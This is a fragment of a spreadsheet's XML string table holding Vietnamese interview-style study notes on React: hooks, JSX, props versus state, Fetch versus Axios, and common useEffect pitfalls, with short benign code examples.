Bất đồng bộ (Các hàm setTimeout, async/await, Promise).
Trình xử lý sự kiện (Ví dụ hàm click chuột onClick).
Để bắt lỗi trong API (async/await) hoặc trong onClick, bạn bắt buộc vẫn phải dùng try/catch truyền thống.</t>
  </si>
  <si>
    <t>2. Giao diện người dùng (Frontend):
React.js/Next.js (CSR/SSR)
Đồng bộ hóa trạng thái và máy khách WebSocket (React Query, Zustand, Redux Toolkit)
Nắm vững kỹ thuật đồng bộ dữ liệu từ file server → DB
Nắm vững kỹ thuật quản lý rate limit &amp; retry logic. Kỹ thuật caching (Redis, memory cache, ETag)
WebSocket / Socket.IO (phân bổ kết nối, quản lý phòng, phát sóng sự kiện, xử lý kết nối lại)
Docker, Docker Compose</t>
  </si>
  <si>
    <t>phân biệt Axios và Fetch API</t>
  </si>
  <si>
    <t>Fetch là Web API native của browser, còn Axios là thư viện HTTP client mạnh hơn, hỗ trợ interceptor, auto JSON transform, timeout và xử lý lỗi tốt hơn. Trong project lớn có authentication thì Axios thường được dùng nhiều hơn.</t>
  </si>
  <si>
    <t>fetch("https://api.example.com/users", {
  method: "POST",
  headers: {
    "Content-Type": "application/json",
  },
  body: JSON.stringify({ name: "Tien" }),
})
  .then((response) =&gt; {
    if (!response.ok) {
      throw new Error("Network response was not ok");
    }
    return response.json();
  })
  .then((data) =&gt; console.log(data))
  .catch((error) =&gt; console.error(error)); Fetch không tự throw lỗi khi status 400–500, phải tự check response.ok.</t>
  </si>
  <si>
    <t>import axios from "axios";
axios.post("https://api.example.com/users", {
  name: "Tien",
})
.then((response) =&gt; {
  console.log(response.data);
})
.catch((error) =&gt; {
  console.error(error);
});Axios:
Tự parse JSON
Tự throw lỗi nếu status 400–500
Không cần stringify</t>
  </si>
  <si>
    <t>JSX là gì</t>
  </si>
  <si>
    <t>JSX là một phần mở rộng của cú pháp JavaScript cho phép viết code trông giống như HTML. Nó sẽ biên dịch thành các lời gọi hàm Javascript thông thường, cung cấp một cách tiếp cận dễ hiểu hơn để tạo các markup cho component của bạn.</t>
  </si>
  <si>
    <t>Ta có JSX:  &lt;div className="sidebar" /&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> React.createElement(
   'div',
   {className: 'sidebar'}
 )</t>
  </si>
  <si>
    <t>useState là gì ?</t>
  </si>
  <si>
    <t>Dùng để quản lý state trong functional component
setState là async
Không được mutate trực tiếp:const [count, setCount] = useState(0);  count = 5; sai ::: setCount(5); đúng</t>
  </si>
  <si>
    <t>useEffect là gì</t>
  </si>
  <si>
    <t>Trong React, useEffect là một Hook cho phép bạn thực hiện các side effects (tác vụ phụ) bên trong các Functional Component.
1. Side Effect là gì?
Đó là những tác vụ nằm ngoài phạm vi hiển thị giao diện của React, ví dụ như:
Gọi API lấy dữ liệu.
Thay đổi tiêu đề trang (document.title).
Thiết lập bộ đếm thời gian (setTimeout, setInterval).
Đăng ký hoặc hủy đăng ký các sự kiện (Event Listeners).</t>
  </si>
  <si>
    <t>2. Cấu trúc của useEffect :useEffect(() =&gt; {
  // 1. Đoạn code xử lý side effect ở đây
  return () =&gt; {
    // 2. Cleanup function (Dọn dẹp): Chạy trước khi component bị hủy hoặc trước khi effect chạy lại
  };
}, [dependencies]); // 3. Mảng phụ thuộc</t>
  </si>
  <si>
    <t>Tham số thứ hai	Khi nào Effect chạy?
Không có mảng []	Chạy mọi lần component re-render. (Ít dùng vì tốn hiệu năng).
Mảng rỗng []	Chỉ chạy duy nhất 1 lần sau khi component hiện ra lần đầu (Mounting).
Có biến [count]	Chạy lần đầu và chạy lại mỗi khi giá trị count thay đổi.</t>
  </si>
  <si>
    <t>import React, { useState, useEffect } from 'react';
function PostDetail({ postId }) {
  const [post, setPost] = useState(null);
  useEffect(() =&gt; {
    // Tác vụ phụ: Gọi API lấy dữ liệu
    console.log("Đang lấy dữ liệu cho bài viết:", postId);
    fetch(`https://jsonplaceholder.typicode.com/posts/${postId}`)
      .then(response =&gt; response.json())
      .then(data =&gt; setPost(data));
    // Thay đổi tiêu đề trang
    document.title = `Bài viết số ${postId}`;
    // Hàm dọn dẹp (tùy chọn)
    return () =&gt; {
      console.log("Dọn dẹp trước khi đổi bài viết hoặc tắt component");
    };
  }, [postId]); // Effect chỉ chạy lại khi postId thay đổi
  if (!post) return &lt;p&gt;Đang tải...&lt;/p&gt;;
  return (
    &lt;div&gt;
      &lt;h1&gt;{post.title}&lt;/h1&gt;
      &lt;p&gt;{post.body}&lt;/p&gt;
    &lt;/div&gt;
  );
}</t>
  </si>
  <si>
    <t>5. Lưu ý về hàm Cleanup (Dọn dẹp)
Nếu bạn dùng setInterval hoặc đăng ký sự kiện window.addEventListener trong useEffect, bạn bắt buộc phải dùng hàm return để xóa chúng đi. Nếu không, khi bạn chuyển trang, các hàm đó vẫn chạy ngầm gây tốn bộ nhớ (Memory Leak).
Tóm lại:
Dùng useEffect khi bạn muốn làm điều gì đó "bên lề" giao diện.
Luôn chú ý đến dependencies để tránh vòng lặp vô tận (re-render liên tục).</t>
  </si>
  <si>
    <t>props drilling là gì</t>
  </si>
  <si>
    <t>Props Drilling (Khoan Props) là một hiện tượng trong React khi bạn phải truyền dữ liệu (props) qua quá nhiều tầng Component trung gian chỉ để đưa nó đến một Component con ở rất sâu bên dưới, mặc dù các Component trung gian đó không hề cần đến dữ liệu này.
Hãy tưởng tượng bạn muốn tặng một món quà cho người cháu (Component cháu), nhưng phải đưa qua tay người cha (Component cha), người cha lại đưa qua người con (Component con)... Những người ở giữa chỉ đóng vai trò "người vận chuyển".</t>
  </si>
  <si>
    <t>function App() {
  const [user, setUser] = useState({ name: "Hoàng" });
  return &lt;Header user={user} /&gt;; // App truyền cho Header
}
function Header({ user }) {
  return &lt;Navbar user={user} /&gt;; // Header không dùng, nhưng phải nhận để truyền cho Navbar
}
function Navbar({ user }) {
  return &lt;UserMenu user={user} /&gt;; // Navbar cũng không dùng, truyền tiếp cho UserMenu
}
function UserMenu({ user }) {
  return &lt;UserInfo user={user} /&gt;; // Cuối cùng UserInfo mới là đứa thực sự cần 'user'
}
function UserInfo({ user }) {
  return &lt;div&gt;Xin chào, {user.name}&lt;/div&gt;;</t>
  </si>
  <si>
    <t>2. Tại sao Props Drilling lại là vấn đề?
Khó bảo trì: Nếu bạn muốn đổi tên prop user thành currentUser, bạn phải đi sửa ở tất cả các file/component trung gian.
Code rác (Boilerplate): Các component trung gian bị "ô nhiễm" bởi những dữ liệu mà chúng không quan tâm.
Khó tái sử dụng: Component Navbar giờ đây bị phụ thuộc vào việc phải nhận user, khiến việc đem nó sang trang khác dùng trở nên khó khăn hơn.</t>
  </si>
  <si>
    <t>3. Cách giải quyết (Lấp "hố khoan")
Khi "hố khoan" quá sâu (quá 3-4 tầng), lập trình viên thường dùng các cách sau:
React Context API: Tạo ra một "kho dữ liệu chung". Component con ở bất cứ đâu cũng có thể thò tay vào lấy mà không cần qua cha trung gian.
Ví dụ: Dùng cho Theme (Sáng/Tối), Thông tin đăng nhập, Ngôn ngữ.
State Management (Redux, Zustand): Các thư viện quản lý trạng thái tập trung cho các ứng dụng lớn.
Component Composition (Kết hợp Component): Truyền trực tiếp Component con vào làm children của Component cha để bỏ qua các bước trung gian.
Tóm lại: Props Drilling không phải là lỗi, nó là một đặc điểm của React. Tuy nhiên, nếu bạn thấy mình đang truyền một prop qua quá nhiều lớp mà không dùng đến, đó là lúc nên cân nhắc dùng Context API.</t>
  </si>
  <si>
    <t>React là gì? Library hay Framework? Vì sao phổ biến?</t>
  </si>
  <si>
    <t>React là một thư viện (Library) JavaScript mã nguồn mở do Facebook phát triển để xây dựng Giao diện người dùng (UI). Nó không phải framework (như Angular) vì nó chỉ lo phần "View" (Giao diện), bạn cần tự chọn công cụ khác để làm Routing hay gọi API.</t>
  </si>
  <si>
    <t>Nó phổ biến vì: Dễ học, dùng lại code tốt (component-based), và hiệu năng cao nhờ Virtual DOM.</t>
  </si>
  <si>
    <t>JSX là gì? Có phải HTML không? Dịch ra gì?</t>
  </si>
  <si>
    <t>JSX (JavaScript XML) là cú pháp viết code nhìn rất giống HTML nhưng được viết bên trong file JavaScript. Nó không phải HTML.</t>
  </si>
  <si>
    <t>Trước khi chạy, công cụ Babel sẽ biên dịch (compile) JSX biến thành các lời gọi hàm JS thuần: React.createElement('div', props, children).</t>
  </si>
  <si>
    <t>Component là gì? Functional vs Class component?</t>
  </si>
  <si>
    <t>Component là các "khối lego" UI độc lập, có thể tái sử dụng (VD: Nút bấm, Thanh Header).
Class Component (Cách cũ): Là một class ES6 kế thừa từ React.Component, quản lý state phức tạp, dùng các Lifecycle (vòng đời).</t>
  </si>
  <si>
    <t>Functional Component (Cách mới): Chỉ là một hàm JS bình thường trả về JSX. Kể từ khi có React Hooks (phiên bản 16.8), Functional component trở thành tiêu chuẩn vì code cực ngắn và dễ đọc.</t>
  </si>
  <si>
    <t>// Hàm JS nhận props và trả về JSX
function NhanVien({ ten }) {
  return &lt;h1&gt;Xin chào, {ten}!&lt;/h1&gt;;
}</t>
  </si>
  <si>
    <t>Props và State khác nhau thế nào?</t>
  </si>
  <si>
    <t>Props: Là dữ liệu được truyền từ Cha xuống Con. Con chỉ được phép đọc (Read-only), không được quyền sửa Props.</t>
  </si>
  <si>
    <t>State: Là dữ liệu nội bộ riêng của bản thân component đó (như trí nhớ của nó). Component có toàn quyền thay đổi State của mình.</t>
  </si>
  <si>
    <t>One-way data flow (Luồng dữ liệu một chiều) là gì?</t>
  </si>
  <si>
    <t>Trong React, dữ liệu chỉ chảy theo một hướng duy nhất: Từ Component Cha chảy xuống Component Con thông qua Props.</t>
  </si>
  <si>
    <t>Không có chuyện Con tự động đẩy dữ liệu ngược lên Cha (trừ khi Cha truyền xuống một hàm callback).</t>
  </si>
  <si>
    <t>Lifting state up (Nâng State lên) &amp; Single source of truth?</t>
  </si>
  <si>
    <t>Lifting state up: Nếu 2 component anh em (Con A và Con B) cần dùng chung một dữ liệu, ta không lưu State ở Con, mà đem State đó "kéo lên" Component Cha chung của chúng, rồi Cha truyền xuống lại qua props.</t>
  </si>
  <si>
    <t>Single source of truth (Nguồn chân lý duy nhất): Nguyên tắc là một dữ liệu chỉ nên được lưu ở MỘT State duy nhất, tránh việc lưu thừa thãi (copy state) ở nhiều nơi gây lỗi sai lệch dữ liệu.</t>
  </si>
  <si>
    <t>function NutBam() {
  // State: Bộ nhớ nội bộ đếm số lần bấm
  const [dem, setDem] = useState(0); 
  // Nút bấm truyền prop 'ten' và 'soLan' xuống component HienThi
  return (
    &lt;div&gt;
      &lt;button onClick={() =&gt; setDem(dem + 1)}&gt;Bấm tôi&lt;/button&gt;
      &lt;HienThi ten="Admin" soLan={dem} /&gt; 
    &lt;/div&gt;
  );
}</t>
  </si>
  <si>
    <t>React render và re-render khi nào?</t>
  </si>
  <si>
    <t>Render: Lần đầu tiên React chạy code của component để vẽ ra màn hình.</t>
  </si>
  <si>
    <t>Re-render: Component sẽ tự động vẽ lại chính nó nếu State hoặc Props của nó bị thay đổi.</t>
  </si>
  <si>
    <t>Virtual DOM, Reconciliation và Fiber là gì?</t>
  </si>
  <si>
    <t>Virtual DOM (DOM ảo): Một bản nháp siêu nhẹ của DOM thật lưu trong RAM.</t>
  </si>
  <si>
    <t>Reconciliation (Thuật toán đối chiếu): Khi State đổi, React tạo ra Virtual DOM mới, mang đi so sánh (diffing) với Virtual DOM cũ để tìm ra đúng chỗ bị thay đổi, sau đó mới cập nhật lên DOM thật 1 lần duy nhất (giúp web không bị giật lag).</t>
  </si>
  <si>
    <t>Fiber: Là "động cơ" (engine) cốt lõi của React từ v16. Nó giúp thuật toán Reconciliation có thể tạm dừng, chia nhỏ các công việc render ra để không làm đơ trình duyệt khi UI quá phức tạp.</t>
  </si>
  <si>
    <t>Tại sao List cần Key? Có nên dùng Index làm key không?</t>
  </si>
  <si>
    <t>Khi in ra một mảng, React bắt buộc phải có key để biết chính xác phần tử nào vừa bị xóa, sửa, hay thêm mới (giúp Reconciliation chạy nhanh).</t>
  </si>
  <si>
    <t>Không nên dùng Index (0, 1, 2...) nếu danh sách có tính năng đảo vị trí, thêm/xóa ở giữa. Vì index luôn đánh lại từ 0, làm React nhầm lẫn và lỗi UI.
Chỉ dùng Index khi: Danh sách tĩnh, không bao giờ thay đổi thứ tự.</t>
  </si>
  <si>
    <t>const users = [
  { id: 1, name: "A" },
  { id: 2, name: "B" }
];
return (
  &lt;&gt;
    {users.map(user =&gt; (
      &lt;div key={user.id}&gt;
        {user.name}
      &lt;/div&gt;
    ))}
  &lt;/&gt;
);</t>
  </si>
  <si>
    <t>Fragment (&lt;React.Fragment&gt; và &lt;&gt;...&lt;/&gt;) là gì?</t>
  </si>
  <si>
    <t>React bắt buộc component chỉ được return về 1 thẻ cha duy nhất. Dùng Fragment để bọc nhiều thẻ con mà không làm sinh ra một thẻ &lt;div&gt; vô nghĩa ở DOM thật.
Cú pháp &lt;&gt; &lt;/&gt; là viết tắt, nhưng nếu bạn cần truyền key trong vòng lặp thì phải viết đầy đủ &lt;React.Fragment key="{id}"&gt;.</t>
  </si>
  <si>
    <t>Trong React:
❌ Component không được return nhiều root element trực tiếp.
Sai:
function App() {
  return (
    &lt;h1&gt;Hello&lt;/h1&gt;
    &lt;p&gt;World&lt;/p&gt;
  );
}</t>
  </si>
  <si>
    <t>Dùng Fragment:
function App() {
  return (
    &lt;&gt;
      &lt;h1&gt;Hello&lt;/h1&gt;
      &lt;p&gt;World&lt;/p&gt;
    &lt;/&gt;
  );
}</t>
  </si>
  <si>
    <t>Prop drilling là gì? Làm sao tránh?</t>
  </si>
  <si>
    <t>Prop Drilling (Khoan Prop): Tình trạng bạn truyền 1 prop qua 5-7 component trung gian không xài đến nó, chỉ để rớt được xuống cái component Cháu Chắt ở tít đáy cần dùng. Code sẽ rất rối.</t>
  </si>
  <si>
    <t>Cách tránh: Dùng Context API (tạo kho chung toàn cục), thư viện Redux/Zustand, hoặc dùng kỹ thuật Composition.</t>
  </si>
  <si>
    <t>Children prop &amp; Composition trong React là gì?</t>
  </si>
  <si>
    <t>Children prop: Là prop đặc biệt. Bất cứ nội dung gì bạn nhét vào giữa thẻ mở và đóng của Component đều sẽ được truyền vào prop tên là children.</t>
  </si>
  <si>
    <t>Composition (Lắp ghép): Tận dụng children để thiết kế các Layout dùng chung (như Modal, Card), tránh việc tạo ra các component khổng lồ ôm đồm mọi thứ.</t>
  </si>
  <si>
    <t>// Khung Modal dùng chung
function KhungModal({ children }) {
  return &lt;div className="modal-bg"&gt;{children}&lt;/div&gt;;
}
// Lắp ghép sử dụng
function App() {
  return (
    &lt;KhungModal&gt;
      {/* Toàn bộ h1 và p dưới đây chính là 'children' */}
      &lt;h1&gt;Xác nhận xóa?&lt;/h1&gt;
      &lt;button&gt;Đồng ý&lt;/button&gt;
    &lt;/KhungModal&gt;
  );
}
```&lt;/React.Fragment&gt;&lt;/React.Fragment&gt;</t>
  </si>
  <si>
    <t>. Vì sao React giới thiệu Hooks?</t>
  </si>
  <si>
    <t>Giúp bỏ hoàn toàn Class Component phức tạp (không còn phải đau đầu với từ khóa this).</t>
  </si>
  <si>
    <t>Dễ dàng chia sẻ và tái sử dụng logic giữa các component (thông qua Custom Hooks) mà không làm cấu trúc DOM bị lồng ghép rối rắm (như HOCs hay Render Props cũ).</t>
  </si>
  <si>
    <t>Rules of Hooks (Luật của Hooks) là gì?</t>
  </si>
  <si>
    <t>Chỉ gọi Hooks ở trên cùng (Top-level): Không gọi Hooks bên trong vòng lặp (for), câu điều kiện (if), hay các hàm lồng nhau.</t>
  </si>
  <si>
    <t>Chỉ gọi Hooks từ React Functional Component (hoặc từ Custom Hooks tự viết). Không gọi trong hàm JS thông thường.</t>
  </si>
  <si>
    <t>Vì sao không được gọi hooks trong điều kiện (if/else)?</t>
  </si>
  <si>
    <t>Bên dưới nền tảng, React quản lý các Hooks dựa trên thứ tự gọi (call order) của chúng. Nếu bạn để Hook trong if, đôi khi nó chạy, đôi khi không, làm thứ tự bị xô lệch</t>
  </si>
  <si>
    <t>Trình duyệt sẽ bị "lú" và map sai State cho biến của bạn, dẫn đến crash ứng dụng.</t>
  </si>
  <si>
    <t>useState dùng để làm gì?</t>
  </si>
  <si>
    <t>Dùng để khai báo một State (biến trạng thái) cho component. Khi State này thay đổi, component sẽ tự động Re-render để cập nhật giao diện.</t>
  </si>
  <si>
    <t>Nhận initial value (giá trị khởi tạo) thế nào?
Bạn truyền giá trị ban đầu vào trong ngoặc useState(giaTri). Trả về một mảng gồm 2 phần tử: [Biến_lưu_giá_trị, Hàm_để_cập_nhật_nó].</t>
  </si>
  <si>
    <t>const [tuoi, setTuoi] = useState(18); // Khởi tạo tuổi = 18</t>
  </si>
  <si>
    <t>Lazy initial state là gì?</t>
  </si>
  <si>
    <t>Nếu giá trị khởi tạo đòi hỏi tính toán cực kỳ phức tạp (chạy mất nhiều giây), ta truyền vào useState một Callback Function (hàm). Nó chỉ chạy đúng 1 lần duy nhất ở lần Render đầu tiên để tiết kiệm hiệu năng.</t>
  </si>
  <si>
    <t>// Hàm tinhToanNang() chỉ chạy 1 lần lúc mới load trang
const [data, setData] = useState(() =&gt; tinhToanNang());</t>
  </si>
  <si>
    <t>Functional update trong setState là gì?</t>
  </si>
  <si>
    <t>Thay vì truyền giá trị mới thẳng vào hàm set, ta truyền một cái hàm nhận vào State cũ, trả ra State mới. Cực kỳ quan trọng khi bạn gọi setState nhiều lần liên tiếp hoặc xử lý bất đồng bộ.</t>
  </si>
  <si>
    <t>// Cách thường (Dễ lỗi nếu gọi liên tiếp):
setCount(count + 1); 
// Functional Update (An toàn tuyệt đối):
setCount(giaTriCu =&gt; giaTriCu + 1);</t>
  </si>
  <si>
    <t>State update có đồng bộ không?</t>
  </si>
  <si>
    <t>KHÔNG. Hàm cập nhật state (như setCount) là bất đồng bộ (asynchronous).</t>
  </si>
  <si>
    <t>Ngay sau khi gọi hàm set, nếu bạn console.log biến đó ra, nó vẫn sẽ in ra giá trị cũ. Nó chỉ thực sự đổi giá trị ở lần Render tiếp theo.</t>
  </si>
  <si>
    <t>useEffect dùng để làm gì?</t>
  </si>
  <si>
    <t>Dùng để thực hiện Side Effects (Tác dụng phụ). Tác dụng phụ là những việc "thò tay ra ngoài" phạm vi của React: Gọi API lấy dữ liệu, can thiệp DOM trực tiếp, cài đặt bộ đếm giờ (setInterval), hoặc lắng nghe sự kiện (addEventListener).</t>
  </si>
  <si>
    <t>Dependency array là gì? Là mảng phụ thuộc (đặt ở tham số thứ 2 của useEffect). Nó nói cho React biết: "Chỉ chạy lại cái Effect này nếu những biến nằm trong mảng này bị thay đổi".</t>
  </si>
  <si>
    <t>Không truyền dependency array thì sao? Hàm Effect sẽ chạy lại SAU MỖI LẦN COMPONENT RE-RENDER. (Rất dễ gây giật lag hoặc lặp vô tận nếu gọi API trong này).</t>
  </si>
  <si>
    <t>Truyền mảng rỗng [] thì sao? Hàm Effect chỉ chạy ĐÚNG 1 LẦN DUY NHẤT khi component vừa xuất hiện trên màn hình (Mount). Dùng để gọi API tải dữ liệu ban đầu. useEffect(() =&gt; {
  console.log("Tôi chỉ chạy 1 lần khi trang load xong!");
}, []); // Mảng rỗng</t>
  </si>
  <si>
    <t>Cleanup function dùng khi nào?</t>
  </si>
  <si>
    <t>Là hàm được return bên trong useEffect. Nó dùng để dọn dẹp "rác" trước khi component bị xóa khỏi màn hình (Unmount). Phải dọn dẹp để tránh rò rỉ bộ nhớ (Memory Leak).</t>
  </si>
  <si>
    <t>useEffect(() =&gt; {
  const timer = setInterval(() =&gt; console.log("Tích tắc"), 1000);
  // Cleanup function: Dọn dẹp cái đồng hồ khi tắt component
  return () =&gt; clearInterval(timer); 
}, []);</t>
  </si>
  <si>
    <t>useEffect chạy sau hay trước render?</t>
  </si>
  <si>
    <t>Nó chạy SAU KHI render. (Tức là giao diện HTML đã vẽ lên màn hình xong xuôi thì nó mới chạy ngầm).</t>
  </si>
  <si>
    <t>useLayoutEffect khác gì useEffect?</t>
  </si>
  <si>
    <t>useEffect: Chạy ngầm sau khi màn hình vẽ xong (không làm đứng giao diện).</t>
  </si>
  <si>
    <t>useLayoutEffect: Chạy ĐỒNG BỘ ngay sau khi DOM cập nhật, nhưng TRƯỚC KHI trình duyệt kịp vẽ lên màn hình. Nó sẽ block (chặn) không cho giao diện hiển thị cho đến khi nó chạy xong.</t>
  </si>
  <si>
    <t>Khi nào dùng useLayoutEffect? Chỉ dùng khi bạn cần đo lường phần tử DOM (VD: tính toán lấy chiều cao, tọa độ scroll) rồi ngay lập tức chỉnh sửa lại giao diện. Việc này giúp chống lại hiện tượng giao diện bị "chớp nháy" (flickering). Còn lại 99% trường hợp hãy dùng useEffect.</t>
  </si>
  <si>
    <t>useRef dùng để làm gì?</t>
  </si>
  <si>
    <t>Nó có 2 mục đích chính:
Lấy phần tử DOM: Trỏ thẳng vào một thẻ HTML để gọi các hàm Native (như .focus()).</t>
  </si>
  <si>
    <t>Lưu biến siêu tốc: Cất giữ một giá trị qua các lần Render mà không làm giao diện phải load lại.</t>
  </si>
  <si>
    <t>useRef thay đổi có gây re-render không?</t>
  </si>
  <si>
    <t>HOÀN TOÀN KHÔNG. Đây là điểm khác biệt lớn nhất giữa nó và useState. Việc bạn cập nhật ref.current = 10 sẽ diễn ra trong im lặng, không bắt component phải Re-render lại.</t>
  </si>
  <si>
    <t>function Form() {
  const oNhapLieu = useRef(null);
  const bamDeFocus = () =&gt; {
    // Gọi thẳng hàm focus() của DOM gốc
    oNhapLieu.current.focus(); 
  };
  return (
    &lt;div&gt;
      &lt;input ref={oNhapLieu} placeholder="Nhập tên..." /&gt;
      &lt;button onClick={bamDeFocus}&gt;Focus vào ô nhập&lt;/button&gt;
    &lt;/div&gt;
  );
}</t>
  </si>
  <si>
    <t>useMemo dùng để làm gì?</t>
  </si>
  <si>
    <t>Ghi nhớ (cache) một giá trị kết quả của một phép tính nặng. Nó chỉ tính toán lại khi các dependency thay đổi.</t>
  </si>
  <si>
    <t>useCallback dùng để làm gì?</t>
  </si>
  <si>
    <t>Ghi nhớ một hàm (function). Nó giúp hàm không bị tạo lại ở mỗi lần component re-render.</t>
  </si>
  <si>
    <t>Khác biệt giữa useMemo và useCallback?</t>
  </si>
  <si>
    <t>useMemo trả về một giá trị, còn useCallback trả về một hàm. Thực chất useCallback(fn, deps) tương đương với useMemo(() =&gt; fn, deps).</t>
  </si>
  <si>
    <t>Không useMemo
const sortedData =
 bigArray.sort();
Render nào cũng:
sort lại
Có useMemo
const sortedData =
 useMemo(() =&gt; {
   return bigArray.sort();
 }, [bigArray]);</t>
  </si>
  <si>
    <t>Parent:
const Child = memo(() =&gt; {
 console.log("child");
 return &lt;button /&gt;;
});
Không useCallback
const handleClick =
 () =&gt; {};
Parent rerender:
function mới
Child:
rerender
Có useCallback
const handleClick =
 useCallback(() =&gt; {}, []);
Child:
không rerender</t>
  </si>
  <si>
    <t>So sánh
                 useMemo           useCallback
Memoize  value                   function
Return      kết quả                function
Use case  expensive calc    stable function</t>
  </si>
  <si>
    <t>Khi nào KHÔNG NÊN dùng useMemo/useCallback?</t>
  </si>
  <si>
    <t>hông dùng cho các phép tính nhẹ, hoặc các hàm đơn giản không truyền xuống component con. Việc dùng bừa bãi sẽ làm web chậm hơn vì React tốn thêm bộ nhớ và chu kỳ so sánh dependency để duy trì bộ nhớ cache.</t>
  </si>
  <si>
    <t>Chỉ dùng khi:
Phép tính toán quá nặng (map/filter mảng hàng ngàn phần tử).
Truyền hàm/giá trị xuống một component con có bọc React.memo để tránh component con bị re-render vô cớ.</t>
  </si>
  <si>
    <t>function TinhToan({ data, onAction }) {
  // Tránh tính lại mảng dài nếu data không đổi
  const ketQuaNang = useMemo(() =&gt; data.filter(x =&gt; x &gt; 100), [data]);
  // Tránh tạo lại hàm nếu không cần thiết
  const handleClick = useCallback(() =&gt; {
    onAction(ketQuaNang);
  }, [ketQuaNang, onAction]);
  return &lt;Button onClick={handleClick}&gt;Bấm&lt;/Button&gt;;
}</t>
  </si>
  <si>
    <t>useReducer là gì? Khác gì useState?</t>
  </si>
  <si>
    <t>Giống như một "mini-Redux". Nó dùng để quản lý state, nhưng khác useState ở chỗ: thay vì gán giá trị trực tiếp, bạn gửi các action (hành động) vào một hàm reducer để xử lý logic phức tạp. Dùng khi state là một object lớn, nhiều logic phụ thuộc nhau.</t>
  </si>
  <si>
    <t>const reducer = (state, action) =&gt; {
  if (action.type === 'TANG') return { count: state.count + 1 };
  return state;
};
function Counter() {
  const [state, dispatch] = useReducer(reducer, { count: 0 });
  return &lt;button onClick={() =&gt; dispatch({ type: 'TANG' })}&gt;{state.count}&lt;/button&gt;;
}</t>
  </si>
  <si>
    <t>Context API và useContext là gì?</t>
  </si>
  <si>
    <t>Context API là "đường hầm" giúp truyền dữ liệu trực tiếp từ component Ông/Cụ xuống thẳng Cháu/Chắt mà không cần đi qua từng lớp trung gian (giải quyết Prop Drilling). useContext là hook để "móc" vào đường hầm đó lấy dữ liệu ra.</t>
  </si>
  <si>
    <t>Context có gây re-render không?</t>
  </si>
  <si>
    <t>CÓ. Bất cứ khi nào giá trị trong Context thay đổi, TẤT CẢ các component đang gọi useContext lấy giá trị đó đều sẽ bị ép re-render (dù chúng chỉ dùng một phần nhỏ của object đó).</t>
  </si>
  <si>
    <t>Làm sao tối ưu Context?</t>
  </si>
  <si>
    <t>Tách Context ra: Đừng gom chung tất cả vào 1 kho. Hãy tách thành StateContext và DispatchContext riêng.
Bọc useMemo cho giá trị truyền vào value của Context Provider.</t>
  </si>
  <si>
    <t>Custom hook là gì? Khi nào nên tách?</t>
  </si>
  <si>
    <t>Là việc bạn tự chế ra một Hook mới (bắt đầu bằng chữ use) bằng cách gom nhiều hook cơ bản lại với nhau. Nên tách ra khi bạn thấy một đoạn logic (như gọi API, đếm giờ, check kích thước màn hình) lặp lại ở nhiều file khác nhau.</t>
  </si>
  <si>
    <t>Custom hook có thể dùng hook khác không?</t>
  </si>
  <si>
    <t>Tất nhiên rồi! Custom hook sinh ra là để nhóm các hook khác (useState, useEffect) lại.</t>
  </si>
  <si>
    <t>forwardRef và useImperativeHandle là gì?</t>
  </si>
  <si>
    <t>Mặc định bạn không thể truyền ref từ Cha xuống thẳng Con.
forwardRef: Giúp Component Con "mở cửa" cho phép Cha chọc ref vào một thẻ HTML bên trong nó.
useImperativeHandle: Cấp quyền tinh chỉnh. Tránh cho Cha toàn quyền thao tác DOM của Con, Con chỉ lộ ra đúng các hàm cần thiết cho Cha gọi.</t>
  </si>
  <si>
    <t>const CustomInput = forwardRef((props, ref) =&gt; {
  const inputRef = useRef();
  useImperativeHandle(ref, () =&gt; ({
    // Cha chỉ được gọi hàm focus, không được quyền đổi màu hay xóa thẻ
    focus: () =&gt; inputRef.current.focus()
  }));
  return &lt;input ref={inputRef} /&gt;;
});</t>
  </si>
  <si>
    <t>Bắt bệnh useEffect (Cạm bẫy khó nhằn)
22. Stale closure là gì?</t>
  </si>
  <si>
    <t>"Closure bị thiu". Là lỗi khi hàm trong useEffect (hoặc setInterval) ghi nhớ mãi một giá trị State cũ của lần render đầu tiên, và nó không bao giờ lấy được giá trị mới nhất.</t>
  </si>
  <si>
    <t>Cách xử lý stale closure?</t>
  </si>
  <si>
    <t>Thêm biến đó vào dependency array của Hook, hoặc dùng Functional Update (setState(prev =&gt; prev + 1)), hoặc cất giá trị đó vào useRef.</t>
  </si>
  <si>
    <t>Infinite loop trong useEffect xảy ra khi nào?</t>
  </si>
  <si>
    <t>Khi bạn gọi setState() bên trong một useEffect không có dependency array, hoặc có chứa chính cái state đó trong array. Component re-render -&gt; Gọi Effect -&gt; Set State -&gt; Lại re-render -&gt; Gọi Effect... (Vòng lặp vô tận sập web).</t>
  </si>
  <si>
    <t>StrictMode chạy useEffect 2 lần ở React 18?</t>
  </si>
  <si>
    <t>Trên môi trường dev, Strict Mode của React 18 cố tình chạy luồng: Mount -&gt; Unmount -&gt; Mount lại một lần nữa.</t>
  </si>
  <si>
    <t>Mục đích là để "test độ cứng" của code bạn, ép bạn phải viết Cleanup Function dọn dẹp đàng hoàng (như ngắt kết nối WebSocket, xóa setInterval). Nếu code bạn đúng chuẩn, việc chạy 2 lần này không gây lỗi data. (Khi build lên Production, nó chỉ chạy 1 lần).</t>
  </si>
  <si>
    <t>for (int i = 1; i &lt;= 5 ; i++ ){
        String index = String.valueOf(i);
        System.out.println(index.repeat(i));</t>
  </si>
  <si>
    <t>PHẦN 4: Hooks của React 18 (Concurrent Features)
17. useId dùng làm gì?
Tạo ra một chuỗi ID ngẫu nhiên, độc nhất. Cực kỳ an toàn khi dùng cho thuộc tính id của các thẻ HTML liên quan đến Accessibility (như nối &lt;label&gt; với &lt;input&gt;) mà không sợ đụng độ khi SSR (Server-Side Rendering).
18. useTransition là gì?
Đánh dấu một thay đổi state là "không khẩn cấp". Giúp giao diện vẫn mượt mà, không bị đơ trong lúc chờ React render các tính toán quá nặng.
19. useDeferredValue dùng khi nào?
Giống như tính năng Debounce. Nó giúp hoãn lại việc cập nhật giao diện của một biến cho đến khi trình duyệt rảnh rỗi. Dùng rất nhiều ở chức năng Search (chờ người dùng gõ xong mới render list kết quả nặng).
20 &amp; 21. useSyncExternalStore và useInsertionEffect?
useSyncExternalStore: Hook chuyên dụng để đọc data từ một kho dữ liệu bên ngoài React (như Redux, Zustand) mà không bị lỗi tearing (rách giao diện).
useInsertionEffect: Hook chạy TRƯỚC CẢ lúc React chạm vào DOM. Thường chỉ dành cho các tác giả viết thư viện CSS-in-JS (như Styled Components) để nhét style vào &lt;head&gt; nhằm tránh chớp nháy Layout.</t>
  </si>
  <si>
